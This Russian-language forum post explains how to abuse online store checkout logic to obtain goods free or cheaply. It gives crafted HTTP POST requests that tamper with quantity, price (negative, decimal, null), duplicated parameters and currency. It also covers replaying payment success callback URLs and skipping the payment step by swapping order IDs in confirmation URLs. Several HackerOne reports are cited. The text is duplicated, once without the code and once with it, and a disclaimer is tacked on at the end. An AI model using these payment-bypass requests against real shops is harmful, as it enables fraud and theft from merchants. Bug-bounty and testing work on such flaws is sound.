Lord777
Professional
- Messages
- 2,579
- Reaction score
- 1,478
- Points
- 113
Всем привет.
Три вещи по цене одной, бесплатные билеты на футбол или бургер с 99% скидкой. Иногда возможно и такое.
Попробуйте управлять количеством
Например вы выбрали 1 товар, поменяйте его на 3, чтобы получить два предмета бесплатно:
Реальные примеры подобной уязвимости можете посмотреть тут (https://hackerone.com/reports/364843), тут (https://hackerone.com/reports/403783) и тут (https://hackerone.com/reports/771694).
Попробуйте манипулировать ценой
Например первоначальная цена 10, поменяйте её на -10 или на десятичное значение, например 0.10, чтобы получить товар дешевле. Можно также использовать zero, NaN или null, чтобы вызвать логические проблемы:
Примеры подобных отчётов тут (https://hackerone.com/reports/927661) и тут (https://hackerone.com/reports/422331).
Попробуйте использовать загрязнение параметров
Например:
Попробуйте манипулировать валютой
Например, первоначальная валюта - доллар, попробуйте измените его на INR, чтобы получить товар дешевле:
Следите за логикой выполнения и параметрами
Выберите PayPal или CoinPayments в качестве способа оплаты. Перехватывая все запросы, вы можете найти параметр под названием «Success», «Referer» или «Callback». Если значение внутри параметра имеет URL-адрес, например:
Скопируйте его и откройте в новом окне. Вы можете обнаружить, что ваш платеж прошел успешно.
Пропускайте некоторые шаги
Если вы сделаете первый заказ и пройдёте все этапы, например:
Попробуйте сделать второй заказ и пропустить этап оплаты, заменив идентификатор на этапе подтверждения:
затем перейдите в Burp Repeater и измените
Вся информация предоставлена исключительно с целью ознакомления. Мы не несём ответственности за ваши действия.
Три вещи по цене одной, бесплатные билеты на футбол или бургер с 99% скидкой. Иногда возможно и такое.

Например вы выбрали 1 товар, поменяйте его на 3, чтобы получить два предмета бесплатно:
Code:
POST /buying-something HTTP/1.1
Host: www.company.com
Quantity=1&price=10¤cy=INR&token=************&add=egy
Реальные примеры подобной уязвимости можете посмотреть тут (https://hackerone.com/reports/364843), тут (https://hackerone.com/reports/403783) и тут (https://hackerone.com/reports/771694).

Например первоначальная цена 10, поменяйте её на -10 или на десятичное значение, например 0.10, чтобы получить товар дешевле. Можно также использовать zero, NaN или null, чтобы вызвать логические проблемы:
Code:
POST /buying-something HTTP/1.1
Host: www.company.com
Quantity=1&price=-10¤cy=dollar&token=************&add=egy
Примеры подобных отчётов тут (https://hackerone.com/reports/927661) и тут (https://hackerone.com/reports/422331).

Например:
Code:
POST /buying-something HTTP/1.1
Host: www.company.com
Quantity=1&Quantity=2&price=10¤cy=dollar&token=************&add=egy

Например, первоначальная валюта - доллар, попробуйте измените его на INR, чтобы получить товар дешевле:
Code:
POST /buying-something HTTP/1.1
Host: www.company.com
Quantity=1&price=10¤cy=INR&token=************&add=egy

Выберите PayPal или CoinPayments в качестве способа оплаты. Перехватывая все запросы, вы можете найти параметр под названием «Success», «Referer» или «Callback». Если значение внутри параметра имеет URL-адрес, например:
Code:
example.com/payment/MD5HASH
Скопируйте его и откройте в новом окне. Вы можете обнаружить, что ваш платеж прошел успешно.

Если вы сделаете первый заказ и пройдёте все этапы, например:
Code:
/order/1/shipping ->
/order/1/payment ->
/order/1/confirmation
Попробуйте сделать второй заказ и пропустить этап оплаты, заменив идентификатор на этапе подтверждения:
Code:
order/2/shipping ->
Code:
/order/1/confirmation на /order/2/confirmation и выполните запрос.
Вся информация предоставлена исключительно с целью ознакомления. Мы не несём ответственности за ваши действия.